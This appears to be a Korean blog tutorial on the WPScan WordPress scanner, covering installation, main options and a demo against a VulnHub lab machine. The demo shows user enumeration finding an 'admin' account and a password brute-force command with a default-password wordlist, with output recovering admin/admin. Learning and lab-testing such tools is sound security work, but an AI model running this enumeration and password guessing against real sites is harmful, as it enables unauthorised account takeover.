Introduction

wordpress를 사용하는 웹 사이트에 대한 보안 취약점으루검사하고, 보안 설정을 분석하는 오픈 소스 도구이다.

현재 wordpress는 전 세계에서 가장 인기 있는 CMS이다. 현재 작성일 기준으로 wordpress의 시장 점유율은 64.3%로 아주 높은 점유율로 독과점 지위를 차지하고 있다.

설치 방법

sudo apt install wpscan

기본적인 사용법

wordpress를 사용하는 웹 사이트를 스캔하기 위한 기본적인 명령어는 아래와 같다.

wpscan --url <http://target.com>

주요 옵션

각 옵션은 약자로 사용이 가능하다 : —enumerate-u → -e u

옵션 설명

--url 대상 웹사이트의 URL 지정
--enumerate 테마, 플러그인, 사용자 등을 열거하는 옵션
--plugins-detection 플러그인 감지 옵션
--themes-detection 테마 감지 옵션
--wp-version 워드프레스 버전 감지 옵션
--enumerate-vul 취약점 검사 및 열거 옵션
--enumerate-p 플러그인 관련 정보 열거 옵션
--enumerate-t 테마 관련 정보 열거 옵션
--enumerate-u 사용자 관련 정보 열거 옵션
--enumerate-s 검색 엔진 디렉터리 및 파일 열거 옵션
--follow-redirection 리디렉션을 따라가는 옵션
--proxy 프록시 서버 설정 옵션

exmple

“해당 시연은 vulnhub에서 제공하는 서버를 대상으로 수행”

______________________________________________________________
         __          _______   _____
         \\ \\        / /  __ \\ / ____|
          \\ \\  /\\  / /| |__) | (___   ___  __ _ _ __ ®
           \\ \\/  \\/ / |  ___/ \\___ \\ / __|/ _` | '_ \\
            \\  /\\  /  | |     ____) | (__| (_| | | | |
             \\/  \\/   |_|    |_____/ \\___|\\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - <https://automattic.com/>
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL:  [172.30.1.15]
[+] Started: Wed Sep 20 23:26:50 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - <http://codex.wordpress.org/XML-RPC_Pingback_API>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>

[+] WordPress readme found: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - <https://www.iplocation.net/defend-wordpress-from-ddos>
 |  - <https://github.com/wpscanteam/wpscan/issues/1299>

[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
 | Found By: Emoji Settings (Passive Detection)
 |  - , Match: '-release.min.js?ver=4.9.23'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - , Match: 'WordPress 4.9.23'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>

[+] Finished: Wed Sep 20 23:26:51 2023
[+] Requests Done: 24
[+] Cached Requests: 29
[+] Data Sent: 6.362 KB
[+] Data Received: 122.319 KB
[+] Memory used: 155.508 MB
[+] Elapsed time: 00:00:00

admin 이라는 계정이 존재한다는 걸 알 수 있으며, 이를 통해 무차별 대입연계를 하여

패스워드를 추출 할 수 있다.

wpscan --url <http://172.30.1.15/secret> --usernames admin --passwords /usr/share/wordlists/metasploit/http_default_pass.txt --max-threads 20

[+] URL:  [172.30.1.15]
[+] Started: Wed Sep 20 23:33:11 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - <http://codex.wordpress.org/XML-RPC_Pingback_API>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>

[+] WordPress readme found: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - <https://www.iplocation.net/defend-wordpress-from-ddos>
 |  - <https://github.com/wpscanteam/wpscan/issues/1299>

[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
 | Found By: Emoji Settings (Passive Detection)
 |  - , Match: '-release.min.js?ver=4.9.23'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - , Match: 'WordPress 4.9.23'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin                                                                                                                                                
Trying admin / turnkey Time: 00:00:00 <================================================                                                 > (19 / 38) 50.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>

[+] Finished: Wed Sep 20 23:33:15 2023
[+] Requests Done: 159
[+] Cached Requests: 30
[+] Data Sent: 43.075 KB
[+] Data Received: 86.61 KB
[+] Memory used: 207.621 MB
[+] Elapsed time: 00:00:04

패스워드까지 획득한 것을 확인할 수 있다.

 

 

 

※ 내용이 이상하거나 문제가 있을 경우, 또는 설명에 부족한 내용이 있으시면 알려 주시면 감사합니다.

저작자표시 (새창열림)

'도구|Tools' 카테고리의 다른 글

[도구/Tools] Nikto  (0) 2023.10.04
[도구/Tools] unix-privesc-check  (0) 2023.10.01
[도구/Tools] Nmap  (0) 2023.10.01
[도구/Tools] dirbuster  (0) 2023.10.01
[도구/Tools] NetDiscover  (0) 2023.10.01

티스토리툴바